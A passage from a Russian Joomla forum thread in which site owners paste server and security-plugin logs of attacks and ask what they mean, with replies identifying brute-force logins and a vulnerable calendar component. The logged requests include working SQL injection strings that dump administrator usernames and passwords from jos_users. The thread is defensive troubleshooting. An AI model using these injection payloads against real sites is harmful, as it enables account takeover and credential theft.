Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 678 Ответов
  • 244090 Просмотров
*

xukvagpam

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
Что это означает в логах jGuard

Код
#<?php die('Direct Access To Log Files Not Permitted'); ?>
#Version: 1.0
#Date: 2012-10-18 18:38:05
#Fields: date time level c-ip status comment
#Software: Joomla! 1.5.26 Stable [ senu takaa ama busani ] 27-March-2012 18:00 GMT
2012-10-18 18:38:05 - 93.181.206.4 - Changed GET value from:   6 Result: использован никнейм "emaccinue"; пиктокод дешифрован; успех; to:

А вот запись в логах сервера от этого IP

Код
93.181.206.4 - - [18/Oct/2012:22:38:05 +0400] "GET /index.php?option=com_phocaguestbook&view=phocaguestbook&id=1&Itemid=6+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22emaccinue%22;+%EF%E8%EA%F2%EE%EA%EE%E4+%E4%E5%F8%E8%F4%F0%EE%E2%E0%ED;+%F3%F1%EF%E5%F5; HTTP/1.0" 301 -
93.181.206.4 - - [18/Oct/2012:22:38:06 +0400] "GET / HTTP/1.0" 200 36177
*

illussion

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
** Table name in url [GET:category] => aca\' /*!union*//**//*!select*/ group_concat(username,0x3a,password,0x3a,usertype) from jos_users where usertype=\'Super Administrator\' -- \'
** Table name in url [REQUEST:category] => aca\' /*!union*//**//*!select*/ group_concat(username,0x3a,password,0x3a,usertype) from jos_users where usertype=\'Super Administrator\' -- \'

**PAGE / SERVER INFO


*REMOTE_ADDR :
89.149.194.172

*HTTP_USER_AGENT :
xpymep.exe

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_myblog&category=aca'%20/*!union*//**//*!select*/%20group_concat(username,0x3a,password,0x3a,usertype)%20from%20jos_users%20where%20usertype='Super%20Administrator'%20--%20'



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[option] => com_myblog
 -[category] => aca\' /*!union*//**//*!select*/ group_concat(username,0x3a,password,0x3a,usertype) from -- users where usertype=\'Super Administrator\' -- \'


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[option] => com_myblog
 -[category] => aca\' /*!union*//**//*!select*/ group_concat(username,0x3a,password,0x3a,usertype) from -- users where usertype=\'Super Administrator\' -- \'
*

Sergeyy

  • Захожу иногда
  • 154
  • 3 / 0
Здравствуйте!
Посмотрите тему:
http://joomlaforum.ru/index.php/topic,233697.0.html
создал в общих темах, не копировать ведь сюда?
*

Apple_Buy

  • Захожу иногда
  • 71
  • 1 / 0
  • Истина всегда рядом....
Использую только стандартную комплектацию Joomla 2.5.7 + Xmap + шаблон yootheme больше никаких сторонних компонентов

Компонент перенаправления записал попытку взлома (если правильно понимаю):
Код
http://tpgtitan.ru/ru/?option=com_spidercalendar&date=999999.9'+union+all+select+null,null,concat(0x3D3D3D3D3D,username,0x3D,password,0x3D3D3D3D3D),null,null,null+from+jos_users+--++D4NB4R
насколько этот способ взлома актуален для 2.5.7 ?

лестно, конечно, что сайт удостоился такого внимания, но хотелось бы оставить эти попытки безрезультатными.

Если у Вас не установлен на сайте компонент Joomla! Spider Calendar Lite 1.4 или его более ранняя версия, то бояться не стоит.

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре "date" в сценарии index.php (когда параметр "option" равен "com_spidercalendar"). Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения
*

assaru

  • Давно я тут
  • 763
  • 88 / 1
Проблему можно решить и по скрину и по эмоциям, счет на оплату через ЛС (с) Nobody
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
*

Go-destroy

  • Захожу иногда
  • 221
  • 4 / 1
давно уже замечал в стандартном компоненте перенаправления, ошибки ссылок, имена которых схожи с системнами файлами wordprese и drupal!
Подозреваю что пытались опредилить cms!
А вот вчера начал обнаруживать такое:

http://joomla.org/obratnaya-svyaz/obratnaya-svyaz/obratnaya-svyaz/obratnaya-svyaz/obratnaya-svyaz/obratnaya-svyaz/obratnaya-svyaz
http://joomla.org/obratnaya-svyaz/obratnaya-svyaz/obratnaya-svyaz/obratnaya-svyaz/obratnaya-svyaz/obratnaya-svyaz
http://joomla.org/obratnaya-svyaz/obratnaya-svyaz

   
http://joomla.org/obratnaya-svyaz++++++++++++++++++++++++++++++++Result:+chosen+nickname+%22Adammahah%22;+success+%28from+first+page%29;    
http://joomla.org/obratnaya-svyaz++++++++++++++++++++++++++++++++Result:+chosen+nickname+%22Jimmyvk4ys%22;+success+%28from+first+page%29;
http://joomla.org/obratnaya-svyaz++++++++++++++++++++++++++++++++Result:+chosen+nickname+%22Stuptumvefmen%22;+success+%28from+first+page%29;
http://joomla.org/obratnaya-svyaz+%5BPLM=0%5D+GET+http://joomla.org/obratnaya-svyaz+%5B0,12376,31509%5D+-%3E+%5BN%5D+POST+http://joomla.org/obratna


obratnaya-svyaz++++++++++++++++++++++++++++++++Result:+chosen+nickname+"Adammahah";+success+(from+first+page);    
obratnaya-svyaz++++++++++++++++++++++++++++++++Result:+chosen+nickname+"Jimmyvk4ys";+success+(from+first+page);      
obratnaya-svyaz++++++++++++++++++++++++++++++++Result:+chosen+nickname+"Stuptumvefmen";+success+(from+first+page);
obratnaya-svyaz+[PLM=0]+GET+obratnaya-svyaz+[0,12376,31509]+->+[N]+POST+obratnaya-svyaz+[R=303][0,0,228]

Кто что поссоветует?


P.S. ссылки введут на стандартный компонент обратной связи!
« Последнее редактирование: 31.10.2012, 23:03:05 от Go-destroy »
*

Go-destroy

  • Захожу иногда
  • 221
  • 4 / 1
CAPTCHA спасет мир  ;)
Капча присутствует)
ты хочеш сказать что это боты ?)
*

Go-destroy

  • Захожу иногда
  • 221
  • 4 / 1
*

Sergeyy

  • Захожу иногда
  • 154
  • 3 / 0
Здравствуйте!
Опять:
Спойлер
[свернуть]

Что это такое?
Начало тут:http://joomlaforum.ru/index.php/topic,233697.0.html
*

RedStyle

  • Захожу иногда
  • 68
  • 1 / 0
Прямо в эту минуты 2 десятка моих сайтов ломает какой-то гад. Во всех логах подобные портянки. Только IP другие.

Начинается всё вот с этого:

46.37.163.242 - - [07/Nov/2012:07:42:19 +0400] "GET /admin.php HTTP/1.0" 404 1734
46.37.163.242 - - [07/Nov/2012:07:43:51 +0400] "GET /wp-login.php HTTP/1.0" 404 1734
212.142.228.182 - - [07/Nov/2012:10:40:11 +0400] "GET /administrator/index.php HTTP/1.0" 404 1734

Ну а далее:

Спойлер
[свернуть]

Пока просто тупо переименовал папку с админкой. Что ещё можно сделать? Изменить права на папку с админкой?
*

Rostok

  • Новичок
  • 7
  • 0 / 0
Подскажи, что происходит, удалил шел на сайте и еще почистил непонятные файлы, но в логах продолжается, не понятно, что твориться + я не могу понять часть кода левые символы
Спойлер
[свернуть]
что это подбор пароля?
50.56.26.124 - - [18/Nov/2012:15:22:41 +0200] "GET /administrator/ HTTP/1.0" 403 291 "-" "GlEKTLOv8AVN8htxWpjK"
50.56.26.124 - - [18/Nov/2012:15:22:42 +0200] "POST /administrator/ HTTP/1.0" 403 291 "-" "GlEKTLOv8AVN8htxWpjK"
50.56.26.124 - - [18/Nov/2012:15:23:23 +0200] "GET /administrator/ HTTP/1.0" 403 291 "-" "6 gFaF8EIK"
50.56.26.124 - - [18/Nov/2012:15:23:23 +0200] "POST /administrator/ HTTP/1.0" 403 291 "-" "6 gFaF8EIK"
50.56.26.124 - - [18/Nov/2012:15:24:03 +0200] "GET /administrator/ HTTP/1.0" 403 291 "-" "80N6cA4e x9v1p1TM8k"
50.56.26.124 - - [18/Nov/2012:15:24:04 +0200] "POST /administrator/ HTTP/1.0" 403 291 "-" "80N6cA4e x9v1p1TM8k"
« Последнее редактирование: 18.11.2012, 17:26:46 от Rostok »
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
*

yrygvay

  • Завсегдатай
  • 1293
  • 36 / 3
Подскажите на что это похоже:
Код
195.239.178.205 - - [09/Dec/2012:03:43:42 +0400] "GET / HTTP/1.0" 200 50037 "-" "Mozilla/5.0 (compatible; Nigma.ru/3.0; crawler@nigma.ru)"
213.171.204.130 - - [09/Dec/2012:04:18:02 +0400] "GET /administrator/ HTTP/1.0" 200 5518 "-" "rAq71IgYLuNNd4TDq"
213.171.204.130 - - [09/Dec/2012:04:18:02 +0400] "POST /administrator/ HTTP/1.0" 303 235 "-" "rAq71IgYLuNNd4TDq"
213.171.204.130 - - [09/Dec/2012:04:18:02 +0400] "GET /administrator/index.php HTTP/1.0" 200 5708 "-" "rAq71IgYLuNNd4TDq"
84.19.62.229 - - [09/Dec/2012:05:15:10 +0400] "GET /administrator/ HTTP/1.0" 200 5518 "-" "oNJ IwCRe5Isk0aiVAtE"
84.19.62.229 - - [09/Dec/2012:05:15:10 +0400] "POST /administrator/ HTTP/1.0" 303 235 "-" "oNJ IwCRe5Isk0aiVAtE"
84.19.62.229 - - [09/Dec/2012:05:15:10 +0400] "GET /administrator/index.php HTTP/1.0" 200 5708 "-" "oNJ IwCRe5Isk0aiVAtE"
213.171.204.130 - - [09/Dec/2012:05:54:20 +0400] "GET /administrator/ HTTP/1.0" 200 5518 "-" "FoPtR5Z93sGP"
213.171.204.130 - - [09/Dec/2012:05:54:20 +0400] "POST /administrator/ HTTP/1.0" 303 235 "-" "FoPtR5Z93sGP"
213.171.204.130 - - [09/Dec/2012:05:54:20 +0400] "GET /administrator/index.php HTTP/1.0" 200 5708 "-" "FoPtR5Z93sGP"
84.19.62.229 - - [09/Dec/2012:07:21:06 +0400] "GET /administrator/ HTTP/1.0" 200 5518 "-" "qahbLKYM4nuQPcfub"
84.19.62.229 - - [09/Dec/2012:07:21:07 +0400] "POST /administrator/ HTTP/1.0" 303 235 "-" "qahbLKYM4nuQPcfub"
84.19.62.229 - - [09/Dec/2012:07:21:07 +0400] "GET /administrator/index.php HTTP/1.0" 200 5708 "-" "qahbLKYM4nuQPcfub"
213.171.204.130 - - [09/Dec/2012:07:32:39 +0400] "GET /administrator/ HTTP/1.0" 200 5518 "-" "mhUBhqtOaJ nHenohCy"
213.171.204.130 - - [09/Dec/2012:07:32:40 +0400] "POST /administrator/ HTTP/1.0" 303 235 "-" "mhUBhqtOaJ nHenohCy"
213.171.204.130 - - [09/Dec/2012:07:32:40 +0400] "GET /administrator/index.php HTTP/1.0" 200 5708 "-" "mhUBhqtOaJ nHenohCy"
213.171.204.130 - - [09/Dec/2012:09:09:51 +0400] "GET /administrator/ HTTP/1.0" 200 5518 "-" "KQ7CwTCIQkT6Z"
213.171.204.130 - - [09/Dec/2012:09:09:51 +0400] "POST /administrator/ HTTP/1.0" 303 235 "-" "KQ7CwTCIQkT6Z"
213.171.204.130 - - [09/Dec/2012:09:09:52 +0400] "GET /administrator/index.php HTTP/1.0" 200 5708 "-" "KQ7CwTCIQkT6Z"
84.19.62.229 - - [09/Dec/2012:09:24:09 +0400] "GET /administrator/ HTTP/1.0" 200 5518 "-" "RAfcDymL6s"
84.19.62.229 - - [09/Dec/2012:09:24:09 +0400] "POST /administrator/ HTTP/1.0" 303 235 "-" "RAfcDymL6s"
84.19.62.229 - - [09/Dec/2012:09:24:09 +0400] "GET /administrator/index.php HTTP/1.0" 200 5708 "-" "RAfcDymL6s"
213.171.204.130 - - [09/Dec/2012:11:03:23 +0400] "GET /administrator/ HTTP/1.0" 200 5518 "-" "hNbMqT fRPFGbrW1"
213.171.204.130 - - [09/Dec/2012:11:03:23 +0400] "POST /administrator/ HTTP/1.0" 303 235 "-" "hNbMqT fRPFGbrW1"
213.171.204.130 - - [09/Dec/2012:11:03:23 +0400] "GET /administrator/index.php HTTP/1.0" 200 5708 "-" "hNbMqT fRPFGbrW1"
Смотрю....
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Цитировать
Подскажите на что это похоже:
на подбор пароля

можно поинтересоваться что за хост, просто есть мысль, и хочу утвердить её
*

freytas11

  • Захожу иногда
  • 83
  • 0 / 0
Подскажите кто в курсе что это означает.

Логи из jhackguard
Спойлер
[свернуть]

из Marco's interceptor warning
Спойлер
[свернуть]
Спойлер
[свернуть]
Спойлер
[свернуть]
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Парочка неудачных попыток взлома + логи яндекса чтоле.
*

AlexJAM

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
Лог JHackGuard 1.4.2:
Спойлер
[свернуть]
Пытался найти более подробную информацию по структуре этого файла, но не получилось.
Буду благодарен за дополнительную информацию - что было, чем закончилось.
Насколько посмотрел - на сайте ../../cache/errors.php файла нет. Да и кеш выключен впринципе - сайт как раз допиливаю по шаблону, только мешает.
« Последнее редактирование: 11.01.2013, 20:14:06 от AlexJAM »
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Кто-то пытался прописать вам редиректы на http://loriannmarchese.com/language/nb-BO/www/0n.php если не ошибаюсь. Через что не пойму. Если php файлы у вас не изменены и плагин нормально отразил атаку, обновите все на сайте.
*

AlexJAM

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
Спасибо за информацию.
Хотелось бы конечно поподробнее узнать про структуру файла лога.

сайт функционирует. все модули обновлены. ждем дальше.

Up. всплыл новый лог.

В папке /logs файлик error.php - в начале как и ожидаемо
 
Спойлер
[свернуть]

лог JHack'а

Спойлер
[свернуть]

 пора искать дыру)
пока прочистил все файлики  утилитой из этой темки. список зараженного при необходимости могу предоставить.

« Последнее редактирование: 15.01.2013, 23:51:42 от AlexJAM »
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
*

AlexJAM

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
Сегодня двойной улов от JHackGuard'а
Спойлер
[свернуть]
и
Спойлер
[свернуть]

Как и в прошлый раз никаких php файлов в директории ../../cache/ нет
*

AlexJAM

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
Снова улов. Прям каждый день... Начинаю беспокоиться)

Спойлер
[свернуть]
*

RexNebular

  • Захожу иногда
  • 52
  • 0 / 0
Доброе утро!
ТОже встала проблема с взломом сайта. Уже все пароли сменил, почистил все, но все равно лезет както...
лог  Marco's SQL Injection
Спойлер
[свернуть]
я так понимаю дырка в ckforms? подскажите пжлст.
*

AlexJAM

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
*

Morphina

  • Новичок
  • 4
  • 0 / 0
Я использую Joostina, поэтому все современные примочки для Joomla мне недоступны. Пытаясь найти хоть какое-то решение наткнулся на такую штуку как NinjaFirewall. Это небольшая самостоятельная программа. В бесплатной версии конечно всё сильно зарезано, но кое-что работает.
Мне тоже на днях попортили все js файлы дописками - я лечил руками и сразу менял права доступа на 444. Помогло.

А вот что по логам (подробностей не особо, но в принципе хватает):

Спойлер
[свернуть]

Спойлер
[свернуть]

Спойлер
[свернуть]

Спойлер
[свернуть]

Спойлер
[свернуть]

Спойлер
[свернуть]

Ну и в таком духе почти весь день. Часть IP заблокировал через .htaccess - посмотрим что ночью делать будут.

*

ihomyak

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
jhackguard перестает работать после обновления до новой 1.4.2 версии.
без обновления все работает.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 340
Последний ответ 31.03.2024, 16:14:32
от SeBun
Скрипты защиты Joomla 4

Автор mister_boy

Ответов: 6
Просмотров: 1161
Последний ответ 16.05.2023, 16:38:58
от mister_boy
Способы защиты сайта от DDoS атак?

Автор IgorMJ

Ответов: 7
Просмотров: 1311
Последний ответ 05.10.2021, 21:39:26
от ShopES
Тестирую сайты на уязвимости

Автор SalityGEN

Ответов: 0
Просмотров: 486
Последний ответ 21.08.2021, 23:01:01
от SalityGEN
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

Ответов: 11
Просмотров: 1089
Последний ответ 03.11.2020, 17:36:03
от Cedars